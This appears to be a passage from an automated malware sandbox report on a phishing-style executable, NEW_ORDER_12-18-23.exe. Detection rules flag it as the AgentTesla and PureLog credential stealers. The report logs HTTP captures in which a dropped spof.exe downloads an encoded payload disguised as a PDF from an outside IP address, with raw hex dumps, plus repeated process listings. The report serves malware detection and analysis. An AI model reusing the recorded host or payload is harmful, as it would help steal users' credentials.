                                        Connection: Keep-Alive
                                        Dec 18, 2023 14:31:19.994237900 CET1286INHTTP/1.1 200 OK
                                        Content-Type: application/pdf
                                        Last-Modified: Mon, 18 Dec 2023 07:44:11 GMT
                                        Accept-Ranges: bytes
                                        ETag: "8420c6fd8531da1:0"
                                        Server: Microsoft-IIS/8.5
                                        Date: Mon, 18 Dec 2023 13:31:19 GMT
                                        Content-Length: 665600
                                        Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 70 00 00 00 0c 00 0a 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 08 00 38 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 08 00 34 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 67 00 64 00 74 00 68 00 41 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 0a 00 3c 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 26 00 00 00 6c 00 6c 00 64 00 2e 00 67 00 64 00 74 00 68 00 41 00 00 00 65 00 6d 00 61 00 4e 00 6c 00
                                        Data Ascii: >p00.0.0.1noisreV ylbmessA80.0.0.1noisreVtcudorP4emaNtcudorP"lld.gdthAemaneliFlanigirO<skramedarTlageL*thgirypoClageL&lld.gdthAemaNl
                                        Dec 18, 2023 14:31:19.994280100 CET1286INData Raw: 61 00 6e 00 72 00 65 00 74 00 6e 00 49 00 01 00 0a 00 34 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 65 00 6c 00 69 00 46 00 01 00 08 00 30 00 00 00 00 00 00 00 00 00 6e 00 6f 00 69 00
                                        Data Ascii: anretnI40.0.0.1noisreVeliF0noitpircseDeliF*emaNynapmoC"stnemmoC0b400000ofnIeliFgnirtS,
                                        Dec 18, 2023 14:31:19.994312048 CET1286INData Raw: d3 fb c8 d8 a1 e6 81 02 44 14 53 d6 2f 10 5d e9 b6 c7 aa 26 5e 5a 51 c0 40 b3 40 f6 1e 25 62 49 b4 08 21 a6 79 43 8e fd 98 71 93 6b 90 11 22 89 5c d7 be ff ff 5b b1 8b 44 f7 af 69 80 98 d8 fd 46 95 01 a8 30 46 13 47 87 c6 2a f5 7c 0f af c1 bd ce
                                        Data Ascii: DS/]&^ZQ@@%bI!yCqk"\[DiF0FG*|$ pVjx=7:\55quw}jBHHt@9IH$dceK:J}kG&J0y-{HD0 0MKDXBg
                                        Dec 18, 2023 14:31:19.994430065 CET1286INData Raw: 70 25 3b 54 85 53 cb 2e 88 f7 da ca f7 d1 01 ae bf fe cd 67 a8 a8 60 c9 d7 74 94 8b e1 67 4e fa 83 6e 84 b5 53 82 bd 2d d5 9c b3 27 4b 26 94 cd 98 1e e6 37 da 49 66 cd bc a2 8e 28 18 cd 7e dd 9d de e4 b8 e2 3f 6d ac d9 98 21 c4 0b 07 b0 b5 ba d2
                                        Data Ascii: p%;TS.g`tgNnS-'K&7If(~?m!BvF%;@E!K#EsTF$dYXoFC(vVCQ%\IA%+6--ZPZ+%%f~fj&0(_bj
                                        Dec 18, 2023 14:31:20.235718012 CET1286INData Raw: 75 57 1f ca dd e7 8c 68 29 06 68 89 0e d9 aa d9 68 05 82 d7 a5 8d 68 40 80 86 91 a8 40 80 85 ab 75 57 07 9e 81 9e 9e 68 14 09 d6 86 d6 a2 68 29 06 68 09 a1 e8 8f b5 68 40 80 86 91 a8 40 80 85 96 75 57 1d 99 ad 8a 68 8c 03 68 02 b5 dd a5 b0 68 40
                                        Data Ascii: uWh)hhh@@uWhh)hh@@uWhhh@@uWhWhh@@uWhWhh@@uWh)hhh@@uWh91h@@uWh9h@@uWh99
                                        Dec 18, 2023 14:31:20.235743046 CET1286INData Raw: f3 c0 9e 97 68 29 02 68 1a fd c2 a7 a5 68 40 80 86 91 a8 40 80 85 98 75 57 1c f0 93 b0 bf 68 89 11 eb 90 bc b1 68 0b 85 82 f4 8e 68 40 80 86 91 a8 40 80 86 90 75 57 09 c8 f7 a5 84 68 8c 04 68 09 c6 dd a9 80 68 40 80 86 91 a8 40 80 85 9a 75 57 0f
                                        Data Ascii: h)hh@@uWhhh@@uWhhh@@uWhhZh@@uWh)hh@@uWhhh@@uWh9wh@@uWhwWhh@@uWh9h@@uW
                                        Dec 18, 2023 14:31:20.235816956 CET1286INData Raw: bb 75 57 11 d3 ef 98 a6 68 57 11 ef 9f cb 80 68 77 13 e1 8d 8d 9e 68 40 80 86 91 a8 40 80 86 99 75 57 1d d0 d6 af a9 68 14 27 ac b6 a9 68 8c 05 68 03 ce b3 a5 ae 68 40 80 86 91 a8 40 80 86 bd 75 57 08 fe dc f2 89 68 77 1f 92 a8 98 ae 68 40 80 86
                                        Data Ascii: uWhWhwh@@uWh'hhh@@uWhwh@@uWh9h@@uWhh)hh@@uWh'hhh@@uWhWh)hh@@uWhwh@@uWhwh
                                        Dec 18, 2023 14:31:20.235883951 CET1286INData Raw: 0d 0d 68 02 0d 04 60 17 68 a0 04 35 60 80 89 95 61 0b 68 87 06 0d 12 68 02 0d 04 60 01 a2 68 87 0a 0d 11 68 02 0d 04 60 01 96 68 87 01 0d 0a 68 00 0d 04 60 01 bc 68 a0 04 35 60 80 89 94 61 03 99 68 01 7c 89 01 98 68 02 8c 68 04 60 35 68 87 01 0d
                                        Data Ascii: h`h5`ahh`hh`hh`h5`ah|hh`5hh`h5`ahh`h@-h`h5`ahh`h5`ahh`hh`'h5`ah-hhh`h5`a<hh`hh`
                                        Dec 18, 2023 14:31:20.235984087 CET1286INData Raw: 04 b7 68 87 14 01 86 68 03 92 68 02 68 02 0d 04 60 04 ae 68 06 7c 14 3f 68 02 bd 68 04 60 02 87 68 a0 04 66 60 80 89 95 61 03 96 68 87 0a 0d 0c 68 02 0d 04 60 02 9d 68 87 01 0d 02 68 00 0d 03 60 08 7c 04 ac 68 01 7c 89 01 ba 68 10 68 04 60 03 9e
                                        Data Ascii: hhhh`h|?hh`hf`ahh`hh`|h|hh`h2h%hh`hhhh`hh`hf`ah|.hh`hhhh`hh!hh`hh`|hhhh` hhhh`hh`hf`
                                        Dec 18, 2023 14:31:20.236067057 CET1286INData Raw: 60 01 90 68 87 01 0d 0e 68 00 0d 04 60 03 a0 68 87 89 11 68 03 87 68 0f 68 02 0d 04 60 03 a8 68 87 89 0b 68 35 68 06 68 00 0d 04 60 02 be 68 0a 7c 89 13 68 31 68 03 60 08 7c 02 b3 68 87 14 2b 68 02 82 68 18 68 02 0d 04 60 02 8b 68 a0 04 35 60 80
                                        Data Ascii: `hh`hhhh`hh5hh`h|h1h`|h+hhh`h5`ah|$hh`h|hh`h5`a*hh`h|;hh`h|7hh`|hhhh`"hh`h!hhh`h6hhh`h5`ahh
                                        Dec 18, 2023 14:31:20.236134052 CET1286INData Raw: a0 04 35 60 80 89 95 61 07 68 87 01 0d 0b 68 00 0d 04 60 02 b4 68 a0 04 66 60 80 89 95 61 05 93 68 87 89 3a 68 01 b9 68 0e 68 00 0d 03 60 08 7c 04 82 68 87 01 0d 0c 68 00 0d 04 60 16 68 a0 04 66 60 80 89 95 61 1b 68 87 0b 0d 09 68 00 0d 04 60 21
                                        Data Ascii: 5`ahh`hf`ah:hhh`|hh`hf`ahh`!hh`hf`ah|/hh`h5`ah|hh`h|<hh`|<hh`h1]`hh`#hh6hh`hhhh`h5`ah|(hh`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.44973745.137.22.163807948C:\Users\user\AppData\Roaming\spof.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 18, 2023 14:31:26.130563021 CET72OUTGET /Akoob.pdf HTTP/1.1
                                        Host: 45.137.22.163
                                        Connection: Keep-Alive
                                        Dec 18, 2023 14:31:26.369484901 CET1286INHTTP/1.1 200 OK
                                        Content-Type: application/pdf
                                        Last-Modified: Mon, 18 Dec 2023 07:44:11 GMT
                                        Accept-Ranges: bytes
                                        ETag: "8420c6fd8531da1:0"
                                        Server: Microsoft-IIS/8.5
                                        Date: Mon, 18 Dec 2023 13:31:25 GMT
                                        Content-Length: 665600
                                        Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 70 00 00 00 0c 00 0a 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 08 00 38 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 08 00 34 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 67 00 64 00 74 00 68 00 41 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 0a 00 3c 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 26 00 00 00 6c 00 6c 00 64 00 2e 00 67 00 64 00 74 00 68 00 41 00 00 00 65 00 6d 00 61 00 4e 00 6c 00
                                        Data Ascii: >p00.0.0.1noisreV ylbmessA80.0.0.1noisreVtcudorP4emaNtcudorP"lld.gdthAemaneliFlanigirO<skramedarTlageL*thgirypoClageL&lld.gdthAemaNl
                                        Dec 18, 2023 14:31:26.369561911 CET1286INData Raw: 61 00 6e 00 72 00 65 00 74 00 6e 00 49 00 01 00 0a 00 34 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 65 00 6c 00 69 00 46 00 01 00 08 00 30 00 00 00 00 00 00 00 00 00 6e 00 6f 00 69 00
                                        Data Ascii: anretnI40.0.0.1noisreVeliF0noitpircseDeliF*emaNynapmoC"stnemmoC0b400000ofnIeliFgnirtS,
                                        Dec 18, 2023 14:31:26.369605064 CET1286INData Raw: d3 fb c8 d8 a1 e6 81 02 44 14 53 d6 2f 10 5d e9 b6 c7 aa 26 5e 5a 51 c0 40 b3 40 f6 1e 25 62 49 b4 08 21 a6 79 43 8e fd 98 71 93 6b 90 11 22 89 5c d7 be ff ff 5b b1 8b 44 f7 af 69 80 98 d8 fd 46 95 01 a8 30 46 13 47 87 c6 2a f5 7c 0f af c1 bd ce
                                        Data Ascii: DS/]&^ZQ@@%bI!yCqk"\[DiF0FG*|$ pVjx=7:\55quw}jBHHt@9IH$dceK:J}kG&J0y-{HD0 0MKDXBg
                                        Dec 18, 2023 14:31:26.369663954 CET1286INData Raw: 70 25 3b 54 85 53 cb 2e 88 f7 da ca f7 d1 01 ae bf fe cd 67 a8 a8 60 c9 d7 74 94 8b e1 67 4e fa 83 6e 84 b5 53 82 bd 2d d5 9c b3 27 4b 26 94 cd 98 1e e6 37 da 49 66 cd bc a2 8e 28 18 cd 7e dd 9d de e4 b8 e2 3f 6d ac d9 98 21 c4 0b 07 b0 b5 ba d2
                                        Data Ascii: p%;TS.g`tgNnS-'K&7If(~?m!BvF%;@E!K#EsTF$dYXoFC(vVCQ%\IA%+6--ZPZ+%%f~fj&0(_bj
                                        Dec 18, 2023 14:31:26.608253956 CET1286INData Raw: 75 57 1f ca dd e7 8c 68 29 06 68 89 0e d9 aa d9 68 05 82 d7 a5 8d 68 40 80 86 91 a8 40 80 85 ab 75 57 07 9e 81 9e 9e 68 14 09 d6 86 d6 a2 68 29 06 68 09 a1 e8 8f b5 68 40 80 86 91 a8 40 80 85 96 75 57 1d 99 ad 8a 68 8c 03 68 02 b5 dd a5 b0 68 40
                                        Data Ascii: uWh)hhh@@uWhh)hh@@uWhhh@@uWhWhh@@uWhWhh@@uWh)hhh@@uWh91h@@uWh9h@@uWh99
                                        Dec 18, 2023 14:31:26.608371019 CET1286INData Raw: f3 c0 9e 97 68 29 02 68 1a fd c2 a7 a5 68 40 80 86 91 a8 40 80 85 98 75 57 1c f0 93 b0 bf 68 89 11 eb 90 bc b1 68 0b 85 82 f4 8e 68 40 80 86 91 a8 40 80 86 90 75 57 09 c8 f7 a5 84 68 8c 04 68 09 c6 dd a9 80 68 40 80 86 91 a8 40 80 85 9a 75 57 0f
                                        Data Ascii: h)hh@@uWhhh@@uWhhh@@uWhhZh@@uWh)hh@@uWhhh@@uWh9wh@@uWhwWhh@@uWh9h@@uW
                                        Dec 18, 2023 14:31:26.608429909 CET1286INData Raw: bb 75 57 11 d3 ef 98 a6 68 57 11 ef 9f cb 80 68 77 13 e1 8d 8d 9e 68 40 80 86 91 a8 40 80 86 99 75 57 1d d0 d6 af a9 68 14 27 ac b6 a9 68 8c 05 68 03 ce b3 a5 ae 68 40 80 86 91 a8 40 80 86 bd 75 57 08 fe dc f2 89 68 77 1f 92 a8 98 ae 68 40 80 86
                                        Data Ascii: uWhWhwh@@uWh'hhh@@uWhwh@@uWh9h@@uWhh)hh@@uWh'hhh@@uWhWh)hh@@uWhwh@@uWhwh
                                        Dec 18, 2023 14:31:26.608529091 CET1286INData Raw: 0d 0d 68 02 0d 04 60 17 68 a0 04 35 60 80 89 95 61 0b 68 87 06 0d 12 68 02 0d 04 60 01 a2 68 87 0a 0d 11 68 02 0d 04 60 01 96 68 87 01 0d 0a 68 00 0d 04 60 01 bc 68 a0 04 35 60 80 89 94 61 03 99 68 01 7c 89 01 98 68 02 8c 68 04 60 35 68 87 01 0d
                                        Data Ascii: h`h5`ahh`hh`hh`h5`ah|hh`5hh`h5`ahh`h@-h`h5`ahh`h5`ahh`hh`'h5`ah-hhh`h5`a<hh`hh`
                                        Dec 18, 2023 14:31:26.608607054 CET1286INData Raw: 04 b7 68 87 14 01 86 68 03 92 68 02 68 02 0d 04 60 04 ae 68 06 7c 14 3f 68 02 bd 68 04 60 02 87 68 a0 04 66 60 80 89 95 61 03 96 68 87 0a 0d 0c 68 02 0d 04 60 02 9d 68 87 01 0d 02 68 00 0d 03 60 08 7c 04 ac 68 01 7c 89 01 ba 68 10 68 04 60 03 9e
                                        Data Ascii: hhhh`h|?hh`hf`ahh`hh`|h|hh`h2h%hh`hhhh`hh`hf`ah|.hh`hhhh`hh!hh`hh`|hhhh` hhhh`hh`hf`
                                        Dec 18, 2023 14:31:26.608694077 CET1286INData Raw: 60 01 90 68 87 01 0d 0e 68 00 0d 04 60 03 a0 68 87 89 11 68 03 87 68 0f 68 02 0d 04 60 03 a8 68 87 89 0b 68 35 68 06 68 00 0d 04 60 02 be 68 0a 7c 89 13 68 31 68 03 60 08 7c 02 b3 68 87 14 2b 68 02 82 68 18 68 02 0d 04 60 02 8b 68 a0 04 35 60 80
                                        Data Ascii: `hh`hhhh`hh5hh`h|h1h`|h+hhh`h5`ah|$hh`h|hh`h5`a*hh`h|;hh`h|7hh`|hhhh`"hh`h!hhh`h6hhh`h5`ahh
                                        Dec 18, 2023 14:31:26.608757973 CET1286INData Raw: a0 04 35 60 80 89 95 61 07 68 87 01 0d 0b 68 00 0d 04 60 02 b4 68 a0 04 66 60 80 89 95 61 05 93 68 87 89 3a 68 01 b9 68 0e 68 00 0d 03 60 08 7c 04 82 68 87 01 0d 0c 68 00 0d 04 60 16 68 a0 04 66 60 80 89 95 61 1b 68 87 0b 0d 09 68 00 0d 04 60 21
                                        Data Ascii: 5`ahh`hf`ah:hhh`|hh`hf`ahh`!hh`hf`ah|/hh`h5`ah|hh`h|<hh`|<hh`h1]`hh`#hh6hh`hhhh`h5`ah|(hh`


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:14:31:02
                                        Start date:18/12/2023
                                        Path:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Imagebase:0x24a79f00000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1750794274.0000024A11F66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1750794274.0000024A11F66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1750794274.0000024A11CFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1749827601.0000024A0034F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1749827601.0000024A0034F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1753742623.0000024A7C850000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1750794274.0000024A10091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:1
                                        Start time:14:31:06
                                        Start date:18/12/2023
                                        Path:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Imagebase:0x1f73d3e0000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:14:31:06
                                        Start date:18/12/2023
                                        Path:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Imagebase:0x18e85480000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:14:31:06
                                        Start date:18/12/2023
                                        Path:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Imagebase:0x164c2e60000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:14:31:07
                                        Start date:18/12/2023
                                        Path:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Imagebase:0x19589c00000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:14:31:07
                                        Start date:18/12/2023
                                        Path:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Imagebase:0x1a8fd480000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:14:31:07
                                        Start date:18/12/2023
                                        Path:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Imagebase:0x22e80990000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:14:31:07
                                        Start date:18/12/2023
                                        Path:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Imagebase:0x1ba048b0000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:14:31:07
                                        Start date:18/12/2023
                                        Path:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Imagebase:0x234bfb90000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:14:31:07
                                        Start date:18/12/2023
                                        Path:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Imagebase:0x27017ff0000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
